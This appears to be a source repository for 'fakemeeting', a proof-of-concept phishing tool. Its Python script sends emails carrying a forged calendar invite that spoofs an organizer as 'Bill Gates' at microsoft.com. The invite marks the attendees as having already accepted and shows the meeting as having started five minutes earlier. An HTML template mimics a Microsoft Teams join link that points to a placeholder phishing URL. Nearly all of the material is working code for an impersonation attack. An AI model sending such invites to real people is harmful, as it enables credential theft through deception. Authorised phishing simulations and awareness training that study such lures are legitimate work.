├── README.md
├── email_template.html
├── fakemeeting.py
└── iCalendar_template.ics
/README.md:
--------------------------------------------------------------------------------
1 | # fakemeeting
2 |
3 | POC tool for creating fake meeting invites.
4 |
5 |
6 | read more at https://www.exandroid.dev/2021/04/24/phishing-with-fake-meeting-invite/
7 |
--------------------------------------------------------------------------------
/email_template.html:
--------------------------------------------------------------------------------
1 | {EVENT_TEXT}
2 | ________________________________________________________________________________
3 | Microsoft Teams meeting
4 | Join on your computer or mobile app
5 | Click here to join the meeting
6 | Learn More | Meeting options
7 | ________________________________________________________________________________
--------------------------------------------------------------------------------
/fakemeeting.py:
--------------------------------------------------------------------------------
1 | import time
2 | import codecs
3 | import smtplib
4 | import datetime
5 | from email.mime.text import MIMEText
6 | from email.mime.base import MIMEBase
7 | from email.encoders import encode_base64
8 | from email.mime.multipart import MIMEMultipart
9 | from email.utils import COMMASPACE, formatdate
10 |
11 |
12 | # smtp settings
13 | SERVER = 'smtp.gmail.com'
14 | PORT = 587
15 | USER_EMAIL = ""
16 | USER_PASS = ""
17 |
18 | # email settings
19 | EMAIL_SUBJECT = "Corona Meeting"
20 |
21 | # event settings
22 | EVENT_DESCRIPTION = "Corona Update Meeting"
23 | EVENT_SUMMARY = "Corona update meeting"
24 |
25 | ORGANIZER_NAME = "Bill Gates"
26 | ORGANIZER_EMAIL = "bill@microsoft.com"
27 | ATTENDEES = ["bob@microsoft.com", "john@microsoft.com"]
28 |
29 | # template settings
30 | EVENT_TEXT = "Corona update"
31 | EVENT_URL = "https://phishing-url-here"
32 |
33 |
34 | def load_template():
35 | template = ""
36 | with codecs.open("email_template.html", 'r', 'utf-8') as f:
37 | template = f.read()
38 | return template
39 |
40 |
41 | def prepare_template():
42 | email_template = load_template()
43 | email_template = email_template.format(EVENT_TEXT=EVENT_TEXT, EVENT_URL=EVENT_URL)
44 | return email_template
45 |
46 |
47 | def load_ics():
48 | ics = ""
49 | with codecs.open("iCalendar_template.ics", 'r', 'utf-8') as f:
50 | ics = f.read()
51 | return ics
52 |
53 |
54 | def prepare_ics(dtstamp, dtstart, dtend):
55 | ics_template = load_ics()
56 | ics_template = ics_template.format(DTSTAMP=dtstamp, DTSTART=dtstart, DTEND=dtend, ORGANIZER_NAME=ORGANIZER_NAME, ORGANIZER_EMAIL=ORGANIZER_EMAIL, DESCRIPTION=EVENT_DESCRIPTION, SUMMARY=EVENT_SUMMARY, ATTENDEES=generate_attendees())
57 | return ics_template
58 |
59 |
60 | def generate_attendees():
61 | attendees = []
62 | for attendee in ATTENDEES:
63 | attendees.append("ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;RSVP=FALSE\r\n ;CN={attendee};X-NUM-GUESTS=0:\r\n mailto:{attendee}".format(attendee=attendee))
64 | return "\r\n".join(attendees)
65 |
66 |
67 | def send_email(to):
68 | print ('Sending email to: ' + to)
69 |
70 | # in .ics file timezone is set to be utc
71 | utc_offset = time.localtime().tm_gmtoff / 60
72 | ddtstart = datetime.datetime.now()
73 | dtoff = datetime.timedelta(minutes=utc_offset + 5) # meeting has started 5 minutes ago
74 | duration = datetime.timedelta(hours = 1) # meeting duration
75 | ddtstart = ddtstart - dtoff
76 | dtend = ddtstart + duration
77 | dtstamp = datetime.datetime.now().strftime("%Y%m%dT%H%M%SZ")
78 | dtstart = ddtstart.strftime("%Y%m%dT%H%M%SZ")
79 | dtend = dtend.strftime("%Y%m%dT%H%M%SZ")
80 |
81 | ics = prepare_ics(dtstamp, dtstart, dtend)
82 |
83 | email_body = prepare_template()
84 |
85 | msg = MIMEMultipart('mixed')
86 | msg['Reply-To']=USER_EMAIL
87 | msg['Date'] = formatdate(localtime=True)
88 | msg['Subject'] = EMAIL_SUBJECT
89 | msg['From'] = USER_EMAIL
90 | msg['To'] = to
91 |
92 | part_email = MIMEText(email_body,"html")
93 | part_cal = MIMEText(ics,'calendar;method=REQUEST')
94 |
95 | msgAlternative = MIMEMultipart('alternative')
96 | msg.attach(msgAlternative)
97 |
98 | ics_atch = MIMEBase('application/ics',' ;name="%s"' % ("invite.ics"))
99 | ics_atch.set_payload(ics)
100 | encode_base64(ics_atch)
101 | ics_atch.add_header('Content-Disposition', 'attachment; filename="%s"' % ("invite.ics"))
102 |
103 | eml_atch = MIMEBase('text/plain','')
104 | eml_atch.set_payload("")
105 | encode_base64(eml_atch)
106 | eml_atch.add_header('Content-Transfer-Encoding', "")
107 |
108 | msgAlternative.attach(part_email)
109 | msgAlternative.attach(part_cal)
110 |
111 | mailServer = smtplib.SMTP(SERVER, PORT)
112 | mailServer.ehlo()
113 | mailServer.starttls()
114 | mailServer.ehlo()
115 | mailServer.login(USER_EMAIL, USER_PASS)
116 | mailServer.sendmail(USER_EMAIL, to, msg.as_string())
117 | mailServer.close()
118 |
119 |
120 | def main():
121 | send_email("")
122 |
123 |
124 | main()
125 |
--------------------------------------------------------------------------------
/iCalendar_template.ics:
--------------------------------------------------------------------------------
1 | BEGIN:VCALENDAR
2 | PRODID:Microsoft Exchange Server 2010
3 | VERSION:2.0
4 | CALSCALE:GREGORIAN
5 | METHOD:REQUEST
6 | BEGIN:VTIMEZONE
7 | TZID:UTC
8 | BEGIN:STANDARD
9 | DTSTART:{DTSTART}
10 | TZOFFSETFROM:+0000
11 | TZOFFSETTO:+0000
12 | END:STANDARD
13 | BEGIN:DAYLIGHT
14 | DTSTART:{DTSTART}
15 | TZOFFSETFROM:+0000
16 | TZOFFSETTO:+0000
17 | END:DAYLIGHT
18 | END:VTIMEZONE
19 | BEGIN:VEVENT
20 | DTSTART;TZID=UTC:{DTSTART}
21 | DTEND;TZID=UTC:{DTEND}
22 | DTSTAMP:{DTSTAMP}
23 | ORGANIZER;CN={ORGANIZER_NAME}:mailto:{ORGANIZER_EMAIL}
24 | UID:FIXMEUID{DTSTAMP}
25 | {ATTENDEES}
26 | CREATED:{DTSTAMP}
27 | DESCRIPTION: {DESCRIPTION}
28 | LAST-MODIFIED:{DTSTAMP}
29 | LOCATION:Microsoft Teams Meeting
30 | SEQUENCE:0
31 | STATUS:CONFIRMED
32 | SUMMARY:{SUMMARY}
33 | TRANSP:OPAQUE
34 | END:VEVENT
35 | END:VCALENDAR
--------------------------------------------------------------------------------